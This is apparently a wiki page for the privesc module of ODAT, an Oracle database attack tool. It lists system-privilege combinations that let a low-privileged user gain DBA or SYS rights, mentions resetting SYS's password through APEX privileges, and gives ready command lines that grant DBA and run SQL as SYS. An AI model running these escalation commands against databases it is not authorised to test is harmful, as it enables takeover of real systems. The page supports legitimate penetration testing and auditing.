-
Notifications
You must be signed in to change notification settings - Fork 345
privesc
This module allows you to gain privileged access (e.g. DBA) using system privileges given to Oracle user used to launch this module. It can be used to get all system privileges given to the current Oracle user also.
With these following combinations of system privileges, the Oracle user can become DBA:
-
CREATE PROCEDURE and EXECUTE ANY PROCEDURE : SYS's privileges
-
CREATE ANY TRIGER (and CREATE PROCEDURE) : SYS's privileges
-
ANALYZE ANY (and CREATE PROCEDURE) : SYS's privileges
-
CREATE ANY INDEX (and CREATE PROCEDURE) : SYS's privileges
-
CREATE ANY PROCEDURE only: it is possible to alter all Oracle users' passwords (e.g. SYS's password) using APEX_040200's privileges. The database needs to be restarted :-(
-
With this privesc module, you can give the DBA role to Oracle user used in this module (e.g. $USER). Here is an example using CREATE/EXECUTE ANY PROCEDURE privileges:
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD --dba-with-create-any-trigger
- Also, it is possible to execute SQL requests as SYS manually. Here is an example using CREATE/EXECUTE ANY PROCEDURE privileges:
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD --exec-with-execute-any-procedure 'GRANT dba TO $USER'
- You can revoke the DBA role using the following command:
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD --revoke-dba-role
- As a reminder, you can use the following command to see commands of this module:
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -h
- The command --get-detailed-privs can be used to get system privileges and roles granted to Oracle user used to run this module. Also, it gets system privileges and roles given to roles granted to Oracle user.
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD --get-detailed-privs
- To see privileges and roles given to the current Oracle user only, the command --get-privs must be used:
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD --get-privs
- Notice these 2 previous commands underlines system privileges that can be exploited by this module to gain privileged access.
Quentin HARDY: [email protected] or [email protected]